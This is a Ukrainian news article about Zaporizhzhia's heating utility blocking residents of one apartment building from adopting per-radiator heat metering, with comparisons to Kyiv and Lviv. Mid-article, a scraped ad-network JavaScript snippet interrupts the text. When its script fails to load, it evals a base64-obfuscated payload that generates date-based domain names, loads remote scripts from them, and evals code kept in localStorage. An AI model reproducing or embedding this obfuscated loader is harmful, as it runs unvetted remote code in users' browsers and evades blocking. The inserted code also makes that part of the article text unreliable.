Жителі Запоріжжя зустрілися з ігноруванням КП “Міські теплові мережі” їхнього права встановлювати у власне житло системи для регулювання споживання тепла. Вже рік мешканці будинку за адресою вул. Покровська, 31 не можуть отримати нові зменшені платіжки від установи.
“Акцент” поспілкувався з уповноваженим представником мешканців будинку Денисом Житницьким. Нижче ми розповімо, як функціонують сучасні технології, які дозволяють споживачам законно економити значні кошти на опаленні. Також ми дізналися, як бюрократія блокує впровадження таких систем у Запоріжжі.
Як система заощаджує на опаленні
“На сьогоднішний день ми платимо за опалення так: є лічильник, який нараховує гігакалорії теплової енергії, а далі — ці гігакалорії розподіляються між мешканцями будинків. У випадку Запоріжжя, це відбувається лише за одним принципом, за квадратними метрами опалювальної площі.” — каже Денис.
Денис Житницький
Часто тепло розподіляється нерівномірно, що призводить до захмарних сум у платіжках або до холоду в оселі, але система побатарейного обліку дозволяє регулювати кожному абоненту кількість спожитого тепла. Кожен має змогу мінімізувати споживання у той час, коли відсутній вдома, або навпаки — за потреби збільшити температуру в оселі на максимум.
Система представляє собою регулятор, який встановлюється на батареях різних типів та окремий лічильник для кожної батареї. На практиці — це ручка з позначками та пластиковий блок невеликого розміру, встановлений на батарею посередині.
Система для регулювання споживання тепла
Щомісяця компанія, яка встановлює лічильник, передає показники до “Тепломереж” від кожного абонента окремо, обліковуючи їх у відсотках від загального спожитого тепла у будинку. Місця загального користування також опалюються, а спожите тепло фіксується на загальному лічильнику. Вартість за це додається у платіжки, вона розподіляється між мешканцями.
“Головне, що споживач може вирішувати, як йому розпоряджатися теплом. Він не переплачує за той час, коли, наприклад, його немає вдома. Може знизити температуру в оселі, якщо йому жарко, або підвищити, якщо холодно” — підкреслює Денис.
Приклади успішної реалізації в Україні
Встановлення систем контролю за споживанням опалення в Україні регулюється пунктом закону про розподільний облік комунальних послуг. За його положеннями, споживачі, які її встановили, мають подати акти з фотографіями встановленої системи до “Тепломереж”, а останні мають їх прийняти протягом 10 днів та у подальшому нараховувати кошти у платіжки за новим принципом. Саме так і відбулося після установки нових систем у Києві та Львові.
“Коли ми встановлювали ці системи у Львові, вже на наступний місяць хтось платив по 7,5 гривен за квадратний метр житла, а хтось, хто не хотів заощаджувати — по 63 гривні. Ще через місяць ситуація вирівнювалась. У порівнянні з попереднім опалювальним сезоном за два місяці вийшла економія близько 60% та близько 50%” — розповідає Денис Житницький.
Таким чином система повністю себе фінансовово виправдовує за 1-2 сезони, бо встановлення системи на 1 батарею коштувало близько 5 тисяч гривень, багато споживачів економлять ці кошти без на опаленні без зусиль. Це при тому, що у Львові дещо холодніше, ніж у Запоріжжі.
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
На Київщині та Львівщині такі системи були погоджені з комунальниками за 1 тиждень. Загалом від початку до кінця процедура переходу на систему займає до 2 тижнів, але у Запоріжжі процес вже триває більше року.
Блокування системи у Запоріжжі
У Запоріжжі у будинку на вул. Покровській, 31, регулярно відбувався “перетоп”, як це називає Денис Житницький, і мешканці отримували непідйомні платіжки за опалення — до 52 гривень за метр квадратний. Мешканці усіх 6 квартир погодилися на зміни — встановлення систем контролю за споживанням тепла на батареї. У нашому місті це перший подібний проект.
Ще до початку минулорічного опалювального сезону до “МТМ” було надіслано усі відповідні документи, але установа не погодила їх у відведений законом термін, як це було у Києві та Львові. Так і досі фактично з новою системою жителі сплачують за платіжками, які формуються за неактуальною методикою, і при цьому все одно економлять до 50%.
“Тепломережі почали посилатися на інший закон, який відповідає комерційному, а не розподільному обліку. Відповіді їхні були “цікаві”. Врешті решт вони сказали, що потрібна заміна гідравліки. Але ж це не відноситься до закону про розподільний облік” — розповідає наш співрозмовник.
Справа у тому, що регулятори на батареях підтримують таку температуру, яку обирає мешканець оселі. Коли “Тепломережі” роблять так, щоб температура була зависокою, ”зайва” тепла вода починає активніше надходити до будинків поруч. Відповідно там стає ще жарче, а платіжки приходять ще більші.
“У цьому будинку (вул. Покровська, 31) встановлено Центральний тепловий пункт (ЦТП), з якого тепло розподіляється на три будинки, але за актуальним законодавством у кожному будинку має бути Індивідуальний тепловий пункт (ІТП). Інженер “Тепломереж” каже, що ми маємо зробити тут ІТП. Я відповідаю, що це не питання, нехай вкажуть зробити це у документах, я виріжу вузол ЦТП з цього будинку, а інші будинки будуть сидіти без опалення або самотужки робити собі нові вузли ІТП. В ЖКГ кажуть, ні, так робити не можна” — описує Денис бюрократичну колізію.
Источник: https://akzent.zp.ua/u-zaporizhzhi-blokuyut-vprovadzhennya-sistemi-yaka-dozvolyaye-zaoshhadzhuvati-do-60-na-opalenni-foto-video/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook